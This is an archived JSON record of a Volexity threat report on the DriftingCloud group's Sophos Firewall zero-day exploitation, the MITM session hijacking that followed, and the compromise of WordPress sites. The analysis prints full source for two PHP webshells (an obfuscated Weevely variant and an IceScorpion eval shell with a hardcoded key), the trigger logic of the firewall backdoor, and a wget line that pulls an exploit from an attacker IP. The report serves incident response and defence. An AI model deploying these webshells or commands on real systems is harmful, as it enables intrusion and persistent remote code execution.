{
	"id": "1d011769-6e25-4326-8a6c-03885d037a7d",
	"created_at": "2026-04-06T00:06:37.439103Z",
	"updated_at": "2026-04-10T03:24:47.417148Z",
	"deleted_at": null,
	"sha1_hash": "fc8b9559e36a8486aa19b9fa384500428755eea5",
	"title": "DriftingCloud: Zero-Day Sophos Firewall Exploitation and an Insidious Breach",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1408883,
	"plain_text": "DriftingCloud: Zero-Day Sophos Firewall Exploitation and an Insidious Breach\r\nBy mindgrub\r\nPublished: 2022-06-15 · Archived: 2026-04-05 13:37:34 UTC\r\nVolexity frequently works with individuals and organizations heavily targeted by sophisticated, motivated, and well-equipped threat actors from around the world. Some of these individuals or organizations are attacked infrequently or on an irregular basis, while others see a barrage of attacks nearly every week. Regardless of the attack frequency, Volexity keeps its guard up, looking for new and old threats however they manifest themselves.\r\nEarlier this year, Volexity detected a sophisticated attack against a customer that is heavily targeted by multiple Chinese advanced persistent threat (APT) groups. This particular attack leveraged a zero-day exploit to compromise the customer’s firewall. Volexity observed the attacker implement an interesting webshell backdoor, create a secondary form of persistence, and ultimately launch attacks against the customer’s staff. These attacks aimed to further breach cloud-hosted web servers hosting the organization’s public-facing websites. This type of attack is rare and difficult to detect. This blog post serves to share what highly targeted organizations are up against and ways to defend against attacks of this nature.\r\nNote that the vulnerability discussed in this article was resolved by Sophos on 25 March 2022, as indicated in this advisory.\r\nDetecting a Firewall Breach\r\nOn March 8, 2022, through its Network Security Monitoring service, Volexity detected anomalous activity emanating from a customer’s Sophos Firewall. Volexity received alerts from custom signatures it had deployed that immediately put the device under suspicion of being compromised. This led to a forensic investigation where Volexity acquired memory, selective files, and disk images from the Sophos Firewall. Analysis of the data led to the discovery of a backdoor on the firewall, as well as evidence of exploitation dating back to March 5, 2022. Volexity’s investigation further expanded once it discovered the attacker was using access to the firewall to conduct man-in-the-middle (MITM) attacks. The attacker used data collected from these MITM attacks to compromise additional systems outside of the network where the firewall resided.\r\nAfter Volexity’s investigation, Sophos published an advisory on March 25, 2022, describing a remote code execution (RCE) vulnerability (submitted by a third party) in its firewalls, covered by CVE-2022-1040. Volexity believes this is the same vulnerability exploited in its investigation, as the customer’s firewall was up to date and met the criteria for remote exploitation. Volexity attributes these attacks to a Chinese APT group previously reported to Volexity Threat Intelligence customers under the name “DriftingCloud”. (Note: The information in this post was available to Volexity Threat Intelligence customers in TIB-20220408 and TIB-20220429.)\r\nIn this blog post, Volexity will discuss the following:\r\nActions the attacker took after successfully compromising the Sophos Firewall\r\nhttps://www.volexity.com/blog/2022/06/15/driftingcloud-zero-day-sophos-firewall-exploitation-and-an-insidious-breach/\r\nPage 1 of 8\r\nHow the attacker used session cookies collected via MITM attacks to compromise external systems outside of the network where the firewall resided\r\nWebshells and malware installed by the attacker, and actions taken on the external system after successful compromise\r\nRecommendations to monitor for similar compromises in your network\r\nAn overview of the attack flow is given below:\r\nBreaching the Firewall\r\nVolexity first identified intrusion activity after detecting suspicious traffic originating from the Sophos Firewall to key systems in its customer’s networks. It was quickly determined the device was likely compromised, and an investigation immediately followed. Volexity first collected memory from the device, and later collected a full disk image to assist in its investigation. Volexity suspected the external-facing User Portal component of the Sophos Firewall might be involved; it was a likely attack vector given it was the only Internet-exposed component of this network. As a result, Volexity reviewed the web access logs for the device before starting other analysis tasks. These logs revealed significant and repeated suspicious access aimed at a valid JSP file (login.jsp), as shown in this sample log entry:\r\n[07/Mar/2022:09:25:58 +0000] \u003credacted\u003e “POST /userportal/webpages/myaccount/login.jsp HTTP/1.1” 200 – 0 “https:// \u003credacted\u003e/userportal/jlbed/fikds4/BQ.jsp” “Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36”\r\nThese requests show a successful HTTP 200 status code. However, inspection of the underlying code for “login.jsp” did not show any anomalies or modifications that would lead Volexity to believe this file had been backdoored. It should be noted that the file “BQ.jsp”, seen in the Referrer field, does not exist as part of the User Portal.\r\nAt this point, Volexity implemented a plan to set up a packet capture on the device to intercept inbound web requests. The attacker was active when Volexity did this, so it did not take long to capture traffic and confirm this traffic was out of the ordinary.\r\nFigure 1. DriftingCloud interacting with a webshell on the Sophos Firewall\r\nPrior to capturing network traffic, Volexity captured system memory using Volexity Surge Collect. Data observed from network traffic further aided the investigation of the memory sample. The network traffic combined with analysis of the memory sample proved to be productive for piecing together various aspects of the attacker’s activity.\r\nOne item identified was the presence of large base64 strings adjacent to suspicious requests made to the User Portal component of the device (Figure 2), similar to those seen in Figure 1.\r\nFigure 2. Example suspicious strings in memory\r\nUsing the adjacent strings as a pivot point, Volexity searched the firewall’s disk for files containing strings similar to those adjacent to the base64 blobs in memory. In doing so, Volexity identified that the following legitimate component of the firewall had been modified by the attacker:\r\n/usr/share/webconsole/WEB-INF/classes/cyberoam/sessionmanagement/SessionCheckFilter.class\r\nThe investigation revealed the attacker timestomped this file, so its last modify time was the same as other files in this directory. This CLASS file is a legitimate component of the Sophos Firewall. Its purpose is to call SessionCheckHelper with correct parameters based on the current URI, which in turn verifies that the user has a valid session (and if not, it directs them to log in). Without reverse-engineering the firewall’s web UI, Volexity assumes this helper is called when any request is made to any component of the Sophos Firewall’s portal. The attacker created their own version of this file containing malicious logic. A decompilation of the malicious file using ByteCodeViewer is shown in Figure 3.\r\nFigure 3. A decompilation of the malicious SessionCheckFilter.class file\r\nIn summary, the malicious code added to SessionCheckFilter.class used the following workflow:\r\nCheck that the incoming request URI or “Accept” HTTP header contains the string “Applicationssid”; if this fails, proceed with legitimate functionality.\r\nCheck that the incoming request is a POST; if this fails, proceed with legitimate functionality.\r\nIf both checks pass, decode the POST body using base64 and AES using the key “a918c0e8d8153bfc”; this is likely a partial (16-character) MD5 of a plaintext password used on the attacker’s side.\r\nThe result of the decode should be another CLASS file, which is loaded using SecureClassLoader.\r\nThis workflow effectively backdoored the Sophos Firewall with a webshell that could be accessed through any URL of the attacker’s choosing. The attacker attempted to blend in by accessing this webshell through requests against the “login.jsp” file. At first glance, this might appear to be a brute-force login attempt instead of an interaction with a backdoor. The only real elements that appeared out of the ordinary in the log files were the referrer values and the response status codes. CLASS files are compiled and not simply text files, which makes an edit like this less trivial than in similar webshell cases. It is likely the attacker decompiled the class (either by retrieving it from the firewall, or from a local firewall used for testing), and then created their own version locally before re-compiling it and placing it on the device.\r\nVolexity decoded some requests made by the attacker using this webshell and found the attacker was using the publicly available BEHINDER framework. It is interesting to note that this is the same framework Volexity believed was leveraged by one or more Chinese APT groups involved in the recent zero-day exploitation of Confluence Server systems by way of CVE-2022-26134.\r\nAdditional Findings from the Firewall\r\nIn addition to this webshell component, Volexity identified several other actions performed by the attacker on the Sophos Firewall that further compromised the victim and ensured persistence.\r\nThe attacker created VPN user accounts and associated certificate pairs on the firewall to facilitate legitimate remote network access.\r\nAs part of the exploitation of the Sophos Firewall, the attacker wrote and executed a file on disk at the following path:\r\n/conf/certificate/pre_install.sh\r\nWhen executed, the “pre_install.sh” file runs a malicious command to download a binary, execute it, then delete it from disk. At the time of analysis, the binary was absent from the command-and-control (C2) server, and it was not present in memory or on disk. This file did not appear to be a legitimate component of the firewall.\r\nMoving Beyond the Firewall\r\nWhile gaining access to the target’s Sophos Firewall was likely a primary objective, it appears this was not the attacker’s only objective. Volexity discovered that the attacker used their access to the firewall to modify DNS responses for specially targeted websites in order to perform MITM attacks. The modified DNS responses were for hostnames that belonged to the victim organization and for which they administered and managed the content. This allowed the attacker to intercept user credentials and session cookies from administrative access to the websites’ content management system (CMS). Volexity determined that in multiple cases, the attacker was able to access the CMS admin pages of the victim organization’s websites with valid session cookies they had hijacked.\r\nThe log snippet below shows the first interaction with a victim web domain by the attacker:\r\n172.x.x.x – – – – [16/Mar/2022:08:19:57 +0000] “target.tld” “GET /wp-admin/ HTTP/1.1” 200 46067 “-” “Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0” “103.76.xx.xx”\r\nUsing these session cookies, the attacker was able to directly access the WordPress admin panel without sending a username and password, and they accessed a page that allows installation of additional plugins:\r\n172.x.x.x – – – – [16/Mar/2022:08:22:04 +0000] “target.tld” “GET /wp-admin/plugins.php HTTP/1.1” 200 42941 “https://target.tld/wp-admin/” “Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0” “103.76.xx.xx”\r\n172.x.x.x – – – – [16/Mar/2022:08:22:07 +0000] “target.tld” “GET /wp-admin/plugin-install.php HTTP/1.1” 200 41547 “https://target.tld.org/wp-admin/” “Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0” “103.76.xx.xx”\r\nThe attacker then searched for the File Manager plugin and installed it. This plugin can be used to perform file management tasks on the website, such as uploading, downloading, editing, or deleting a file:\r\n172.x.x.x – – – – [16/Mar/2022:08:26:21 +0000] “target.tld” “GET /wp-admin/plugins.php?_wpnonce=13241af34c\u0026action=activate\u0026plugin=wp-file-manager/file_folder_manager.php HTTP/1.1” 302 0 “https://target.tld/wp-admin/plugin-install.php?s=file%20manager\u0026tab=search\u0026type=term” “Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0” “103.76.x.x”\r\n172.x.x.x – – – – [16/Mar/2022:08:26:22 +0000] “target.tld” “GET /wp-admin/plugins.php?activate=true\u0026plugin_status=all\u0026paged=1\u0026s= HTTP/1.1” 200 43523 “https://target.tld/wp-admin/plugin-install.php?s=file%20manager\u0026tab=search\u0026type=term” “Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0” “103.76.x.x”\r\n172.x.x.x – – – – [16/Mar/2022:08:26:43 +0000] “target.tld” “GET /wp-admin/admin.php?page=wp_file_manager HTTP/1.1” 200 37492 “https://target.tld/wp-admin/plugins.php” “Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0” “103.76.x.x”\r\nHaving successfully installed the File Manager plugin, the attacker used it to upload a PHP file, placing it in the March 2022 WordPress uploads directory:\r\n172.x.x.x – – – – [16/Mar/2022:08:29:16 +0000] “target.tld” “GET /wp-admin/admin-ajax.php?action=mk_file_folder_manager\u0026_wpnonce=1fead1b621\u0026networkhref=\u0026cmd=ls\u0026target=l1_d3AtY29udGXteC71cGxvYWRzLzIwMjEvMTI\u0026\u003credacted\u003e.php\u0026reqid=1b191dc2be41a2 HTTP/1.1” 200 11 “https://target.tld /wp-admin/admin.php?page=wp_file_manager” “Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0” “103.76.xx.xx”\r\nFinally, the attacker deactivated the File Manager plugin:\r\n172.x.x.x – – – – [16/Mar/2022:08:32:01 +0000] “target.tld” “GET /wp-admin/plugins.php?action=deactivate\u0026plugin=wp-file-manager%2Ffile_folder_manager.php\u0026plugin_status=all\u0026paged=1\u0026s\u0026_wpnonce=bc1ca29a43 HTTP/1.1” 302 0 “https://target.tld/wp-admin/plugins.php” “Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0” “103.76.xx.xx”\r\nThe webshell was fairly short and consisted of the following PHP code, which appears to be a variation on the Weevely webshell:\r\n\u003c?php\r\n$J=’Ktch(“/K$kh(.+K)K$kf/”,@fileK_get_contents(“pKhpK://inpuKt”K),$m)’;\r\n$e=’==1) {@oKb_stKart();@eKval(K@gzuncKomprKess(@x(@bKase64_KdecKode($’;\r\n$P=str_replace(‘VG’,”,’cVGreaVGtVGVGe_fVGunVGction’);\r\n$l=’$k=”1506aKdbd”;$Kkh=”7eKfK1ee10Kd884″;$kf=”9K82K58e20d7a0″K;’;\r\n$C=’K$p=”Kwton3r3P7tKKHoi9Uk”;functioKn Kx($Kt,$k){$c=stKKrlen($k)KK;$l=s’;\r\n$B=’trlen(K$t);$oK=””;for($iK=K0;$i\u003c$lK;){for($jK=K0;($j\u003c$cK\u0026\u0026$i’;\r\n$X=’r=@bKase64_enKcode(K@x(@gzcoKmpKKrKess($o),$k));printK(“$p$kKh$r$kf”);}’;\r\n$W=’m[1K]),K$k)));$KKo=@ob_get_contKentKs();@ob_KendK_clean()K;$’;\r\n$y='\u003c$l);$j++K,$i++K)K{$o.K=$t{$i}^$Kk{$j};}}reKturn K$oK;}if (@pregKK_ma’;\r\n$a=str_replace(‘K’,”,$l.$C.$B.$y.$J.$e.$W.$X);\r\n$S=$P(”,$a);$S();\r\n?\u003e\r\nThis is a simple shell that reads the file input, base64 decodes it, decompresses it, and then runs an eval() on the resulting PHP statement. Evidently this was not the attacker’s preferred shell, however, as they quickly installed a second shell with a name based on an existing PHP file. This is a popular webshell that appears to go by many names, including IceScorpion, and has the following contents:\r\n\u003c?php\r\n@error_reporting(0);\r\nsession_start();\r\n$key=”aece158[snipped]”; // This key is the first 16 characters of the 32-character MD5 of the connection password; the default connection password is rebeyond\r\n$_SESSION[‘k’]=$key;\r\nsession_write_close();\r\n$post=file_get_contents(“php://input”);\r\nif(!extension_loaded(‘openssl’))\r\n{\r\n$t=”base64_”.”decode”;\r\n$post=$t($post.””);\r\nfor($i=0;$i\u003cstrlen($post);$i++) {\r\n$post[$i] = $post[$i]^$key[$i+1\u002615];\r\n}\r\n}\r\nelse\r\n{\r\n$post=openssl_decrypt($post, “AES128″, $key);\r\n}\r\n$arr=explode(‘|’,$post);\r\n$func=$arr[0];\r\n$params=$arr[1];\r\nclass C{public function __invoke($p) {eval($p.””);}}\r\n@call_user_func(new C(),$params);\r\n?\u003e\r\nThis has similar functionality but uses AES128 encryption with a hardcoded password “aece158afa2f0f49”. This is the main shell that the attacker used in subsequent exploitation. Based on PCAPs relating to this shell, other logs on the system, and analysis of the memory image using Volexity Volcano, Volexity was able to piece together a number of commands issued by the attacker. Some interesting observations are provided below:\r\nThe attacker cloned a GitHub repository for CVE-2021-4034 in an attempt to escalate their privileges.\r\nAfter this did not work, the attacker downloaded a custom implementation of the shared object (db.py) of the same exploit from a GitHub page owned by the attacker (which has since been taken down).\r\nFigure 4. “Gooogleapis” GitHub user and repository containing tools related to compromise of Sophos Firewall devices\r\nThe same GitHub page also included a Sliver binary named “kstrp”. Volexity did not observe this specific file on an infected system or in any command. This could suggest that the same repository was used in operations against other targets.\r\nThe attacker also downloaded another file via wget, which is believed to have been another attempt at privilege escalation on the web server. This file appears to have been an attempt to exploit CVE-2021-4034.\r\nwget http://192.248[.]125.58/cve2021-4034.py -O /tmp/x.py\r\nThe attacker used their access to this webserver to install three open-source malware families: PupyRAT, Pantegana and Sliver. Volexity did not find anything too remarkable about the usage and deployment of these backdoors. However, Volexity did find the server-side configuration for the Pantegana malware to be worth noting: the attacker attempted to operate as “The SWAG” via “SWAG, Inc.”. This looks to be a custom implementation, as it was found to differ from the default certificate.\r\nFigure 5. Customised SSL certificate leveraged by the Pantegana malware, shown in BinaryEdge\r\nConclusion\r\nDriftingCloud is an effective, well-equipped, and persistent threat actor targeting five-poisons-related targets. They are able to develop or purchase zero-day exploits to achieve their goals, tipping the scales in their favor when it comes to gaining entry to target networks. It is critical for organizations that support or consist of targeted groups to have network monitoring solutions in place in order to identify compromises when they inevitably occur. Compromise of gateway devices is a frequent root cause for incidents investigated by Volexity, and compromising them often gives attackers a lead on defenders, who are often focused on endpoint and EDR solutions that are not present on these devices.\r\nSophos has published advice on mitigating this vulnerability in their advisory. Specifically, the advisory states the following:\r\n“Sophos has observed this vulnerability being used to target a small set of specific organizations primarily in the South Asia region. We have informed each of these organizations directly. Sophos will provide further details as we continue to investigate. There is no action required for Sophos Firewall customers with the “Allow automatic installation of hotfixes” feature enabled. Enabled is the default setting.”\r\nTo generically identify similar attacks to those discussed, Volexity recommends the following:\r\nDeploy network security monitoring and other mechanisms to detect and record traffic from gateway devices.\r\nFor Unix-based webservers, consider using auditd to enable easier investigation in the event of compromise.\r\nAsk vendors of perimeter devices (such as firewalls) what capabilities they have to detect a compromise, and what methods would be available for you to investigate a compromise if one were to occur. Some vendors do not allow access to perimeter devices, which can complicate investigations of suspected compromise.\r\nTo prevent these specific attacks from being successful, Volexity recommends the following:\r\nUse the YARA rules listed on GitHub here to identify suspicious related activity.\r\nBlock the IOCs listed on GitHub here.\r\nRelated Indicators\r\nSource: https://www.volexity.com/blog/2022/06/15/driftingcloud-zero-day-sophos-firewall-exploitation-and-an-insidious-breach/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE",
		"MISPGALAXY",
		"Malpedia"
	],
	"references": [
		"https://www.volexity.com/blog/2022/06/15/driftingcloud-zero-day-sophos-firewall-exploitation-and-an-insidious-breach/"
	],
	"report_names": [
		"driftingcloud-zero-day-sophos-firewall-exploitation-and-an-insidious-breach"
	],
	"threat_actors": [
		{
			"id": "c42fe131-a81c-45bb-8f32-61f39263a7d4",
			"created_at": "2023-11-17T02:00:07.60084Z",
			"updated_at": "2026-04-10T02:00:03.45671Z",
			"deleted_at": null,
			"main_name": "DriftingCloud",
			"aliases": [],
			"source_name": "MISPGALAXY:DriftingCloud",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775433997,
	"ts_updated_at": 1775791487,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/fc8b9559e36a8486aa19b9fa384500428755eea5.pdf",
		"text": "https://archive.orkl.eu/fc8b9559e36a8486aa19b9fa384500428755eea5.txt",
		"img": "https://archive.orkl.eu/fc8b9559e36a8486aa19b9fa384500428755eea5.jpg"
	}
}